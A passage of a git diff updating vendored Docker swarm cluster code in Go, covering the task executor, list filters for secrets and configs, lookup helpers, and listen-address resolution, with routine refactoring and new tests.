errors.New("dockerexec: image required") // ErrContainerDestroyed returned when a container is prematurely destroyed // during a wait call. 
- ErrContainerDestroyed = fmt.Errorf("dockerexec: container destroyed") + ErrContainerDestroyed = errors.New("dockerexec: container destroyed") // ErrContainerUnhealthy returned if controller detects the health check failure - ErrContainerUnhealthy = fmt.Errorf("dockerexec: unhealthy container") + ErrContainerUnhealthy = errors.New("dockerexec: unhealthy container") ) diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go index f0dedd4530..940a943e4f 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go @@ -1,30 +1,47 @@ -package container +package container // import "github.com/docker/docker/daemon/cluster/executor/container" import ( + "context" + "fmt" "sort" "strings" + "sync" "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/network" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/cluster/controllers/plugin" + "github.com/docker/docker/daemon/cluster/convert" executorpkg "github.com/docker/docker/daemon/cluster/executor" clustertypes "github.com/docker/docker/daemon/cluster/provider" networktypes "github.com/docker/libnetwork/types" + "github.com/docker/swarmkit/agent" "github.com/docker/swarmkit/agent/exec" - "github.com/docker/swarmkit/agent/secrets" "github.com/docker/swarmkit/api" - "golang.org/x/net/context" + "github.com/docker/swarmkit/api/naming" + "github.com/docker/swarmkit/template" + "github.com/sirupsen/logrus" ) type executor struct { - backend executorpkg.Backend - secrets exec.SecretsManager + backend executorpkg.Backend + imageBackend executorpkg.ImageBackend + pluginBackend plugin.Backend + volumeBackend executorpkg.VolumeBackend + dependencies exec.DependencyManager + mutex sync.Mutex // This 
mutex protects the following node field + node *api.NodeDescription } // NewExecutor returns an executor from the docker client. -func NewExecutor(b executorpkg.Backend) exec.Executor { +func NewExecutor(b executorpkg.Backend, p plugin.Backend, i executorpkg.ImageBackend, v executorpkg.VolumeBackend) exec.Executor { return &executor{ - backend: b, - secrets: secrets.NewManager(), + backend: b, + pluginBackend: p, + imageBackend: i, + volumeBackend: v, + dependencies: agent.NewDependencyManager(), } } @@ -51,9 +68,10 @@ func (e *executor) Describe(ctx context.Context) (*api.NodeDescription, error) { // the plugin list by default. addPlugins("Network", append([]string{"overlay"}, info.Plugins.Network...)) addPlugins("Authorization", info.Plugins.Authorization) + addPlugins("Log", info.Plugins.Log) // add v2 plugins - v2Plugins, err := e.backend.PluginManager().List() + v2Plugins, err := e.backend.PluginManager().List(filters.NewArgs()) if err == nil { for _, plgn := range v2Plugins { for _, typ := range plgn.Config.Interface.Types { @@ -61,11 +79,15 @@ func (e *executor) Describe(ctx context.Context) (*api.NodeDescription, error) { continue } plgnTyp := typ.Capability - if typ.Capability == "volumedriver" { + switch typ.Capability { + case "volumedriver": plgnTyp = "Volume" - } else if typ.Capability == "networkdriver" { + case "networkdriver": plgnTyp = "Network" + case "logdriver": + plgnTyp = "Log" } + plugins[api.PluginDescription{ Type: plgnTyp, Name: plgn.Name, @@ -106,28 +128,59 @@ func (e *executor) Describe(ctx context.Context) (*api.NodeDescription, error) { Resources: &api.Resources{ NanoCPUs: int64(info.NCPU) * 1e9, MemoryBytes: info.MemTotal, + Generic: convert.GenericResourcesToGRPC(info.GenericResources), }, } + // Save the node information in the executor field + e.mutex.Lock() + e.node = description + e.mutex.Unlock() + return description, nil } func (e *executor) Configure(ctx context.Context, node *api.Node) error { - na := node.Attachment - if na 
== nil { - return nil + var ingressNA *api.NetworkAttachment + attachments := make(map[string]string) + + for _, na := range node.Attachments { + if na == nil || na.Network == nil || len(na.Addresses) == 0 { + // this should not happen, but we got a panic here and don't have a + // good idea about what the underlying data structure looks like. + logrus.WithField("NetworkAttachment", fmt.Sprintf("%#v", na)). + Warnf("skipping nil or malformed node network attachment entry") + continue + } + + if na.Network.Spec.Ingress { + ingressNA = na + } + + attachments[na.Network.ID] = na.Addresses[0] + } + + if (ingressNA == nil) && (node.Attachment != nil) && (len(node.Attachment.Addresses) > 0) { + ingressNA = node.Attachment + attachments[ingressNA.Network.ID] = ingressNA.Addresses[0] + } + + if ingressNA == nil { + e.backend.ReleaseIngress() + return e.backend.GetAttachmentStore().ResetAttachments(attachments) } options := types.NetworkCreate{ - Driver: na.Network.DriverState.Name, + Driver: ingressNA.Network.DriverState.Name, IPAM: &network.IPAM{ - Driver: na.Network.IPAM.Driver.Name, + Driver: ingressNA.Network.IPAM.Driver.Name, }, - Options: na.Network.DriverState.Options, + Options: ingressNA.Network.DriverState.Options, + Ingress: true, CheckDuplicate: true, } - for _, ic := range na.Network.IPAM.Configs { + for _, ic := range ingressNA.Network.IPAM.Configs { c := network.IPAMConfig{ Subnet: ic.Subnet, IPRange: ic.Range, @@ -136,24 +189,66 @@ func (e *executor) Configure(ctx context.Context, node *api.Node) error { options.IPAM.Config = append(options.IPAM.Config, c) } - return e.backend.SetupIngress(clustertypes.NetworkCreateRequest{ - na.Network.ID, - types.NetworkCreateRequest{ - Name: na.Network.Spec.Annotations.Name, + _, err := e.backend.SetupIngress(clustertypes.NetworkCreateRequest{ + ID: ingressNA.Network.ID, + NetworkCreateRequest: types.NetworkCreateRequest{ + Name: ingressNA.Network.Spec.Annotations.Name, NetworkCreate: options, }, - }, na.Addresses[0]) + 
}, ingressNA.Addresses[0]) + if err != nil { + return err + } + + return e.backend.GetAttachmentStore().ResetAttachments(attachments) } // Controller returns a docker container runner. func (e *executor) Controller(t *api.Task) (exec.Controller, error) { + dependencyGetter := template.NewTemplatedDependencyGetter(agent.Restrict(e.dependencies, t), t, nil) + + // Get the node description from the executor field + e.mutex.Lock() + nodeDescription := e.node + e.mutex.Unlock() + if t.Spec.GetAttachment() != nil { - return newNetworkAttacherController(e.backend, t, e.secrets) + return newNetworkAttacherController(e.backend, e.imageBackend, e.volumeBackend, t, nodeDescription, dependencyGetter) } - ctlr, err := newController(e.backend, t, e.secrets) - if err != nil { - return nil, err + var ctlr exec.Controller + switch r := t.Spec.GetRuntime().(type) { + case *api.TaskSpec_Generic: + logrus.WithFields(logrus.Fields{ + "kind": r.Generic.Kind, + "type_url": r.Generic.Payload.TypeUrl, + }).Debug("custom runtime requested") + runtimeKind, err := naming.Runtime(t.Spec) + if err != nil { + return ctlr, err + } + switch runtimeKind { + case string(swarmtypes.RuntimePlugin): + info, _ := e.backend.SystemInfo() + if !info.ExperimentalBuild { + return ctlr, fmt.Errorf("runtime type %q only supported in experimental", swarmtypes.RuntimePlugin) + } + c, err := plugin.NewController(e.pluginBackend, t) + if err != nil { + return ctlr, err + } + ctlr = c + default: + return ctlr, fmt.Errorf("unsupported runtime type: %q", runtimeKind) + } + case *api.TaskSpec_Container: + c, err := newController(e.backend, e.imageBackend, e.volumeBackend, t, nodeDescription, dependencyGetter) + if err != nil { + return ctlr, err + } + ctlr = c + default: + return ctlr, fmt.Errorf("unsupported runtime: %q", r) } return ctlr, nil @@ -177,7 +272,11 @@ func (e *executor) SetNetworkBootstrapKeys(keys []*api.EncryptionKey) error { } func (e *executor) Secrets() exec.SecretsManager { - return e.secrets + 
return e.dependencies.Secrets() +} + +func (e *executor) Configs() exec.ConfigsManager { + return e.dependencies.Configs() } type sortedPlugins []api.PluginDescription diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go index 99cf7502af..03d6273635 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go @@ -1,8 +1,9 @@ // +build !windows -package container +package container // import "github.com/docker/docker/daemon/cluster/executor/container" import ( + "context" "testing" "time" @@ -11,7 +12,6 @@ import ( "github.com/docker/docker/daemon" "github.com/docker/docker/daemon/events" "github.com/docker/swarmkit/api" - "golang.org/x/net/context" ) func TestHealthStates(t *testing.T) { @@ -38,14 +38,12 @@ func TestHealthStates(t *testing.T) { } c := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "id", - Name: "name", - Config: &containertypes.Config{ - Image: "image_name", - Labels: map[string]string{ - "com.docker.swarm.task.id": "id", - }, + ID: "id", + Name: "name", + Config: &containertypes.Config{ + Image: "image_name", + Labels: map[string]string{ + "com.docker.swarm.task.id": "id", }, }, } @@ -54,7 +52,7 @@ func TestHealthStates(t *testing.T) { EventsService: e, } - controller, err := newController(daemon, task, nil) + controller, err := newController(daemon, nil, nil, task, nil, nil) if err != nil { t.Fatalf("create controller fail %v", err) } @@ -87,7 +85,7 @@ func TestHealthStates(t *testing.T) { } case <-timer.C: if expectedErr != nil { - t.Fatalf("time limit exceeded, didn't get expected error") + t.Fatal("time limit exceeded, didn't get expected error") } } } diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go 
b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go index 5fda1f2edb..cbe1f53c38 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go @@ -1,6 +1,7 @@ -package container +package container // import "github.com/docker/docker/daemon/cluster/executor/container" import ( + "errors" "fmt" "path/filepath" @@ -29,7 +30,7 @@ func validateMounts(mounts []api.Mount) error { } case api.MountTypeTmpfs: if mount.Source != "" { - return fmt.Errorf("invalid tmpfs source, source must be empty") + return errors.New("invalid tmpfs source, source must be empty") } default: return fmt.Errorf("invalid mount type: %s", mount.Type) diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go index 9d98e2c008..5e4694ff1b 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go @@ -1,4 +1,4 @@ -package container +package container // import "github.com/docker/docker/daemon/cluster/executor/container" import ( "io/ioutil" @@ -12,7 +12,7 @@ import ( ) func newTestControllerWithMount(m api.Mount) (*controller, error) { - return newController(&daemon.Daemon{}, &api.Task{ + return newController(&daemon.Daemon{}, nil, nil, &api.Task{ ID: stringid.GenerateRandomID(), ServiceID: stringid.GenerateRandomID(), Spec: api.TaskSpec{ @@ -26,7 +26,8 @@ func newTestControllerWithMount(m api.Mount) (*controller, error) { }, }, }, - }, nil) + }, nil, + nil) } func TestControllerValidateMountBind(t *testing.T) { diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go index 
c616eeef93..7a3f053621 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go @@ -1,6 +1,6 @@ // +build !windows -package container +package container // import "github.com/docker/docker/daemon/cluster/executor/container" const ( testAbsPath = "/foo" diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go index c346451d3d..6ee4c96431 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go @@ -1,6 +1,6 @@ // +build windows -package container +package container // import "github.com/docker/docker/daemon/cluster/executor/container" const ( testAbsPath = `c:\foo` diff --git a/vendor/github.com/docker/docker/daemon/cluster/filters.go b/vendor/github.com/docker/docker/daemon/cluster/filters.go index 88668edaac..15469f907d 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/filters.go +++ b/vendor/github.com/docker/docker/daemon/cluster/filters.go @@ -1,4 +1,4 @@ -package cluster +package cluster // import "github.com/docker/docker/daemon/cluster" import ( "fmt" @@ -45,22 +45,6 @@ func newListNodesFilters(filter filters.Args) (*swarmapi.ListNodesRequest_Filter return f, nil } -func newListServicesFilters(filter filters.Args) (*swarmapi.ListServicesRequest_Filters, error) { - accepted := map[string]bool{ - "name": true, - "id": true, - "label": true, - } - if err := filter.Validate(accepted); err != nil { - return nil, err - } - return &swarmapi.ListServicesRequest_Filters{ - NamePrefixes: filter.Get("name"), - IDPrefixes: filter.Get("id"), - Labels: runconfigopts.ConvertKVStringsToMap(filter.Get("label")), - }, nil -} - func 
newListTasksFilters(filter filters.Args, transformFunc func(filters.Args) error) (*swarmapi.ListTasksRequest_Filters, error) { accepted := map[string]bool{ "name": true, @@ -69,6 +53,11 @@ func newListTasksFilters(filter filters.Args, transformFunc func(filters.Args) e "service": true, "node": true, "desired-state": true, + // UpToDate is not meant to be exposed to users. It's for + // internal use in checking create/update progress. Therefore, + // we prefix it with a '_'. + "_up-to-date": true, + "runtime": true, } if err := filter.Validate(accepted); err != nil { return nil, err @@ -84,6 +73,8 @@ func newListTasksFilters(filter filters.Args, transformFunc func(filters.Args) e Labels: runconfigopts.ConvertKVStringsToMap(filter.Get("label")), ServiceIDs: filter.Get("service"), NodeIDs: filter.Get("node"), + UpToDate: len(filter.Get("_up-to-date")) != 0, + Runtimes: filter.Get("runtime"), } for _, s := range filter.Get("desired-state") { @@ -114,3 +105,19 @@ func newListSecretsFilters(filter filters.Args) (*swarmapi.ListSecretsRequest_Fi Labels: runconfigopts.ConvertKVStringsToMap(filter.Get("label")), }, nil } + +func newListConfigsFilters(filter filters.Args) (*swarmapi.ListConfigsRequest_Filters, error) { + accepted := map[string]bool{ + "name": true, + "id": true, + "label": true, + } + if err := filter.Validate(accepted); err != nil { + return nil, err + } + return &swarmapi.ListConfigsRequest_Filters{ + NamePrefixes: filter.Get("name"), + IDPrefixes: filter.Get("id"), + Labels: runconfigopts.ConvertKVStringsToMap(filter.Get("label")), + }, nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/filters_test.go b/vendor/github.com/docker/docker/daemon/cluster/filters_test.go new file mode 100644 index 0000000000..a38feeaaf7 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/filters_test.go @@ -0,0 +1,102 @@ +package cluster // import "github.com/docker/docker/daemon/cluster" + +import ( + "testing" + + 
"github.com/docker/docker/api/types/filters" +) + +func TestNewListSecretsFilters(t *testing.T) { + validNameFilter := filters.NewArgs() + validNameFilter.Add("name", "test_name") + + validIDFilter := filters.NewArgs() + validIDFilter.Add("id", "7c9009d6720f6de3b492f5") + + validLabelFilter := filters.NewArgs() + validLabelFilter.Add("label", "type=test") + validLabelFilter.Add("label", "storage=ssd") + validLabelFilter.Add("label", "memory") + + validNamesFilter := filters.NewArgs() + validNamesFilter.Add("names", "test_name") + + validAllFilter := filters.NewArgs() + validAllFilter.Add("name", "nodeName") + validAllFilter.Add("id", "7c9009d6720f6de3b492f5") + validAllFilter.Add("label", "type=test") + validAllFilter.Add("label", "memory") + validAllFilter.Add("names", "test_name") + + validFilters := []filters.Args{ + validNameFilter, + validIDFilter, + validLabelFilter, + validNamesFilter, + validAllFilter, + } + + invalidTypeFilter := filters.NewArgs() + invalidTypeFilter.Add("nonexist", "aaaa") + + invalidFilters := []filters.Args{ + invalidTypeFilter, + } + + for _, filter := range validFilters { + if _, err := newListSecretsFilters(filter); err != nil { + t.Fatalf("Should get no error, got %v", err) + } + } + + for _, filter := range invalidFilters { + if _, err := newListSecretsFilters(filter); err == nil { + t.Fatalf("Should get an error for filter %v, while got nil", filter) + } + } +} + +func TestNewListConfigsFilters(t *testing.T) { + validNameFilter := filters.NewArgs() + validNameFilter.Add("name", "test_name") + + validIDFilter := filters.NewArgs() + validIDFilter.Add("id", "7c9009d6720f6de3b492f5") + + validLabelFilter := filters.NewArgs() + validLabelFilter.Add("label", "type=test") + validLabelFilter.Add("label", "storage=ssd") + validLabelFilter.Add("label", "memory") + + validAllFilter := filters.NewArgs() + validAllFilter.Add("name", "nodeName") + validAllFilter.Add("id", "7c9009d6720f6de3b492f5") + validAllFilter.Add("label", "type=test") + 
validAllFilter.Add("label", "memory") + + validFilters := []filters.Args{ + validNameFilter, + validIDFilter, + validLabelFilter, + validAllFilter, + } + + invalidTypeFilter := filters.NewArgs() + invalidTypeFilter.Add("nonexist", "aaaa") + + invalidFilters := []filters.Args{ + invalidTypeFilter, + } + + for _, filter := range validFilters { + if _, err := newListConfigsFilters(filter); err != nil { + t.Fatalf("Should get no error, got %v", err) + } + } + + for _, filter := range invalidFilters { + if _, err := newListConfigsFilters(filter); err == nil { + t.Fatalf("Should get an error for filter %v, while got nil", filter) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/helpers.go b/vendor/github.com/docker/docker/daemon/cluster/helpers.go index be5bf56e87..653593e1c0 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/helpers.go +++ b/vendor/github.com/docker/docker/daemon/cluster/helpers.go @@ -1,10 +1,12 @@ -package cluster +package cluster // import "github.com/docker/docker/daemon/cluster" import ( + "context" "fmt" + "github.com/docker/docker/errdefs" swarmapi "github.com/docker/swarmkit/api" - "golang.org/x/net/context" + "github.com/pkg/errors" ) func getSwarm(ctx context.Context, c swarmapi.ControlClient) (*swarmapi.Cluster, error) { @@ -14,7 +16,7 @@ func getSwarm(ctx context.Context, c swarmapi.ControlClient) (*swarmapi.Cluster, } if len(rl.Clusters) == 0 { - return nil, fmt.Errorf("swarm not found") + return nil, errors.WithStack(errNoSwarm) } // TODO: assume one cluster only @@ -23,86 +25,222 @@ func getSwarm(ctx context.Context, c swarmapi.ControlClient) (*swarmapi.Cluster, func getNode(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Node, error) { // GetNode to match via full ID. - rg, err := c.GetNode(ctx, &swarmapi.GetNodeRequest{NodeID: input}) - if err != nil { - // If any error (including NotFound), ListNodes to match via full name. 
- rl, err := c.ListNodes(ctx, &swarmapi.ListNodesRequest{Filters: &swarmapi.ListNodesRequest_Filters{Names: []string{input}}}) - - if err != nil || len(rl.Nodes) == 0 { - // If any error or 0 result, ListNodes to match via ID prefix. - rl, err = c.ListNodes(ctx, &swarmapi.ListNodesRequest{Filters: &swarmapi.ListNodesRequest_Filters{IDPrefixes: []string{input}}}) - } - - if err != nil { - return nil, err - } + if rg, err := c.GetNode(ctx, &swarmapi.GetNodeRequest{NodeID: input}); err == nil { + return rg.Node, nil + } - if len(rl.Nodes) == 0 { - return nil, fmt.Errorf("node %s not found", input) - } + // If any error (including NotFound), ListNodes to match via full name. + rl, err := c.ListNodes(ctx, &swarmapi.ListNodesRequest{ + Filters: &swarmapi.ListNodesRequest_Filters{ + Names: []string{input}, + }, + }) + if err != nil || len(rl.Nodes) == 0 { + // If any error or 0 result, ListNodes to match via ID prefix. + rl, err = c.ListNodes(ctx, &swarmapi.ListNodesRequest{ + Filters: &swarmapi.ListNodesRequest_Filters{ + IDPrefixes: []string{input}, + }, + }) + } + if err != nil { + return nil, err + } - if l := len(rl.Nodes); l > 1 { - return nil, fmt.Errorf("node %s is ambiguous (%d matches found)", input, l) - } + if len(rl.Nodes) == 0 { + err := fmt.Errorf("node %s not found", input) + return nil, errdefs.NotFound(err) + } - return rl.Nodes[0], nil + if l := len(rl.Nodes); l > 1 { + return nil, errdefs.InvalidParameter(fmt.Errorf("node %s is ambiguous (%d matches found)", input, l)) } - return rg.Node, nil + + return rl.Nodes[0], nil } -func getService(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Service, error) { +func getService(ctx context.Context, c swarmapi.ControlClient, input string, insertDefaults bool) (*swarmapi.Service, error) { // GetService to match via full ID. 
- rg, err := c.GetService(ctx, &swarmapi.GetServiceRequest{ServiceID: input}) - if err != nil { - // If any error (including NotFound), ListServices to match via full name. - rl, err := c.ListServices(ctx, &swarmapi.ListServicesRequest{Filters: &swarmapi.ListServicesRequest_Filters{Names: []string{input}}}) - if err != nil || len(rl.Services) == 0 { - // If any error or 0 result, ListServices to match via ID prefix. - rl, err = c.ListServices(ctx, &swarmapi.ListServicesRequest{Filters: &swarmapi.ListServicesRequest_Filters{IDPrefixes: []string{input}}}) - } + if rg, err := c.GetService(ctx, &swarmapi.GetServiceRequest{ServiceID: input, InsertDefaults: insertDefaults}); err == nil { + return rg.Service, nil + } - if err != nil { - return nil, err - } + // If any error (including NotFound), ListServices to match via full name. + rl, err := c.ListServices(ctx, &swarmapi.ListServicesRequest{ + Filters: &swarmapi.ListServicesRequest_Filters{ + Names: []string{input}, + }, + }) + if err != nil || len(rl.Services) == 0 { + // If any error or 0 result, ListServices to match via ID prefix. 
+ rl, err = c.ListServices(ctx, &swarmapi.ListServicesRequest{ + Filters: &swarmapi.ListServicesRequest_Filters{ + IDPrefixes: []string{input}, + }, + }) + } + if err != nil { + return nil, err + } - if len(rl.Services) == 0 { - return nil, fmt.Errorf("service %s not found", input) - } + if len(rl.Services) == 0 { + err := fmt.Errorf("service %s not found", input) + return nil, errdefs.NotFound(err) + } - if l := len(rl.Services); l > 1 { - return nil, fmt.Errorf("service %s is ambiguous (%d matches found)", input, l) - } + if l := len(rl.Services); l > 1 { + return nil, errdefs.InvalidParameter(fmt.Errorf("service %s is ambiguous (%d matches found)", input, l)) + } + if !insertDefaults { return rl.Services[0], nil } - return rg.Service, nil + + rg, err := c.GetService(ctx, &swarmapi.GetServiceRequest{ServiceID: rl.Services[0].ID, InsertDefaults: true}) + if err == nil { + return rg.Service, nil + } + return nil, err } func getTask(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Task, error) { // GetTask to match via full ID. - rg, err := c.GetTask(ctx, &swarmapi.GetTaskRequest{TaskID: input}) + if rg, err := c.GetTask(ctx, &swarmapi.GetTaskRequest{TaskID: input}); err == nil { + return rg.Task, nil + } + + // If any error (including NotFound), ListTasks to match via full name. + rl, err := c.ListTasks(ctx, &swarmapi.ListTasksRequest{ + Filters: &swarmapi.ListTasksRequest_Filters{ + Names: []string{input}, + }, + }) + if err != nil || len(rl.Tasks) == 0 { + // If any error or 0 result, ListTasks to match via ID prefix. + rl, err = c.ListTasks(ctx, &swarmapi.ListTasksRequest{ + Filters: &swarmapi.ListTasksRequest_Filters{ + IDPrefixes: []string{input}, + }, + }) + } if err != nil { - // If any error (including NotFound), ListTasks to match via full name. 
- rl, err := c.ListTasks(ctx, &swarmapi.ListTasksRequest{Filters: &swarmapi.ListTasksRequest_Filters{Names: []string{input}}}) + return nil, err + } - if err != nil || len(rl.Tasks) == 0 { - // If any error or 0 result, ListTasks to match via ID prefix. - rl, err = c.ListTasks(ctx, &swarmapi.ListTasksRequest{Filters: &swarmapi.ListTasksRequest_Filters{IDPrefixes: []string{input}}}) - } + if len(rl.Tasks) == 0 { + err := fmt.Errorf("task %s not found", input) + return nil, errdefs.NotFound(err) + } - if err != nil { - return nil, err - } + if l := len(rl.Tasks); l > 1 { + return nil, errdefs.InvalidParameter(fmt.Errorf("task %s is ambiguous (%d matches found)", input, l)) + } - if len(rl.Tasks) == 0 { - return nil, fmt.Errorf("task %s not found", input) - } + return rl.Tasks[0], nil +} - if l := len(rl.Tasks); l > 1 { - return nil, fmt.Errorf("task %s is ambiguous (%d matches found)", input, l) - } +func getSecret(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Secret, error) { + // attempt to lookup secret by full ID + if rg, err := c.GetSecret(ctx, &swarmapi.GetSecretRequest{SecretID: input}); err == nil { + return rg.Secret, nil + } - return rl.Tasks[0], nil + // If any error (including NotFound), ListSecrets to match via full name. + rl, err := c.ListSecrets(ctx, &swarmapi.ListSecretsRequest{ + Filters: &swarmapi.ListSecretsRequest_Filters{ + Names: []string{input}, + }, + }) + if err != nil || len(rl.Secrets) == 0 { + // If any error or 0 result, ListSecrets to match via ID prefix. 
+ rl, err = c.ListSecrets(ctx, &swarmapi.ListSecretsRequest{ + Filters: &swarmapi.ListSecretsRequest_Filters{ + IDPrefixes: []string{input}, + }, + }) + } + if err != nil { + return nil, err } - return rg.Task, nil + + if len(rl.Secrets) == 0 { + err := fmt.Errorf("secret %s not found", input) + return nil, errdefs.NotFound(err) + } + + if l := len(rl.Secrets); l > 1 { + return nil, errdefs.InvalidParameter(fmt.Errorf("secret %s is ambiguous (%d matches found)", input, l)) + } + + return rl.Secrets[0], nil +} + +func getConfig(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Config, error) { + // attempt to lookup config by full ID + if rg, err := c.GetConfig(ctx, &swarmapi.GetConfigRequest{ConfigID: input}); err == nil { + return rg.Config, nil + } + + // If any error (including NotFound), ListConfigs to match via full name. + rl, err := c.ListConfigs(ctx, &swarmapi.ListConfigsRequest{ + Filters: &swarmapi.ListConfigsRequest_Filters{ + Names: []string{input}, + }, + }) + if err != nil || len(rl.Configs) == 0 { + // If any error or 0 result, ListConfigs to match via ID prefix. + rl, err = c.ListConfigs(ctx, &swarmapi.ListConfigsRequest{ + Filters: &swarmapi.ListConfigsRequest_Filters{ + IDPrefixes: []string{input}, + }, + }) + } + if err != nil { + return nil, err + } + + if len(rl.Configs) == 0 { + err := fmt.Errorf("config %s not found", input) + return nil, errdefs.NotFound(err) + } + + if l := len(rl.Configs); l > 1 { + return nil, errdefs.InvalidParameter(fmt.Errorf("config %s is ambiguous (%d matches found)", input, l)) + } + + return rl.Configs[0], nil +} + +func getNetwork(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Network, error) { + // GetNetwork to match via full ID. + if rg, err := c.GetNetwork(ctx, &swarmapi.GetNetworkRequest{NetworkID: input}); err == nil { + return rg.Network, nil + } + + // If any error (including NotFound), ListNetworks to match via ID prefix and full name. 
+ rl, err := c.ListNetworks(ctx, &swarmapi.ListNetworksRequest{ + Filters: &swarmapi.ListNetworksRequest_Filters{ + Names: []string{input}, + }, + }) + if err != nil || len(rl.Networks) == 0 { + rl, err = c.ListNetworks(ctx, &swarmapi.ListNetworksRequest{ + Filters: &swarmapi.ListNetworksRequest_Filters{ + IDPrefixes: []string{input}, + }, + }) + } + if err != nil { + return nil, err + } + + if len(rl.Networks) == 0 { + return nil, fmt.Errorf("network %s not found", input) + } + + if l := len(rl.Networks); l > 1 { + return nil, errdefs.InvalidParameter(fmt.Errorf("network %s is ambiguous (%d matches found)", input, l)) + } + + return rl.Networks[0], nil } diff --git a/vendor/github.com/docker/docker/daemon/cluster/listen_addr.go b/vendor/github.com/docker/docker/daemon/cluster/listen_addr.go index c24d4865b3..e1ebfec8df 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/listen_addr.go +++ b/vendor/github.com/docker/docker/daemon/cluster/listen_addr.go @@ -1,18 +1,19 @@ -package cluster +package cluster // import "github.com/docker/docker/daemon/cluster" import ( - "errors" "fmt" "net" ) -var ( - errNoSuchInterface = errors.New("no such interface") - errNoIP = errors.New("could not find the system's IP address") - errMustSpecifyListenAddr = errors.New("must specify a listening address because the address to advertise is not recognized as a system address, and a system's IP address to use could not be uniquely identified") - errBadListenAddr = errors.New("listen address must be an IP address or network interface (with optional port number)") - errBadAdvertiseAddr = errors.New("advertise address must be a non-zero IP address or network interface (with optional port number)") - errBadDefaultAdvertiseAddr = errors.New("default advertise address must be a non-zero IP address or network interface (without a port number)") +const ( + errNoSuchInterface configError = "no such interface" + errNoIP configError = "could not find the system's IP address" + 
errMustSpecifyListenAddr configError = "must specify a listening address because the address to advertise is not recognized as a system address, and a system's IP address to use could not be uniquely identified" + errBadNetworkIdentifier configError = "must specify a valid IP address or interface name" + errBadListenAddr configError = "listen address must be an IP address or network interface (with optional port number)" + errBadAdvertiseAddr configError = "advertise address must be a non-zero IP address or network interface (with optional port number)" + errBadDataPathAddr configError = "data path address must be a non-zero IP address or network interface (without a port number)" + errBadDefaultAdvertiseAddr configError = "default advertise address must be a non-zero IP address or network interface (without a port number)" ) func resolveListenAddr(specifiedAddr string) (string, string, error) { @@ -20,23 +21,17 @@ func resolveListenAddr(specifiedAddr string) (string, string, error) { if err != nil { return "", "", fmt.Errorf("could not parse listen address %s", specifiedAddr) } - // Does the host component match any of the interface names on the // system? If so, use the address from that interface. 
- interfaceAddr, err := resolveInterfaceAddr(specifiedHost) - if err == nil { - return interfaceAddr.String(), specifiedPort, nil - } - if err != errNoSuchInterface { + specifiedIP, err := resolveInputIPAddr(specifiedHost, true) + if err != nil { + if err == errBadNetworkIdentifier { + err = errBadListenAddr + } return "", "", err } - // If it's not an interface, it must be an IP (for now) - if net.ParseIP(specifiedHost) == nil { - return "", "", errBadListenAddr - } - - return specifiedHost, specifiedPort, nil + return specifiedIP.String(), specifiedPort, nil } func (c *Cluster) resolveAdvertiseAddr(advertiseAddr, listenAddrPort string) (string, string, error) { @@ -57,43 +52,32 @@ func (c *Cluster) resolveAdvertiseAddr(advertiseAddr, listenAddrPort string) (st advertiseHost = advertiseAddr advertisePort = listenAddrPort } - // Does the host component match any of the interface names on the // system? If so, use the address from that interface. - interfaceAddr, err := resolveInterfaceAddr(advertiseHost) - if err == nil { - return interfaceAddr.String(), advertisePort, nil - } - if err != errNoSuchInterface { + advertiseIP, err := resolveInputIPAddr(advertiseHost, false) + if err != nil { + if err == errBadNetworkIdentifier { + err = errBadAdvertiseAddr + } return "", "", err } - // If it's not an interface, it must be an IP (for now) - if ip := net.ParseIP(advertiseHost); ip == nil || ip.IsUnspecified() { - return "", "", errBadAdvertiseAddr - } - - return advertiseHost, advertisePort, nil + return advertiseIP.String(), advertisePort, nil } if c.config.DefaultAdvertiseAddr != "" { // Does the default advertise address component match any of the // interface names on the system? If so, use the address from // that interface. 
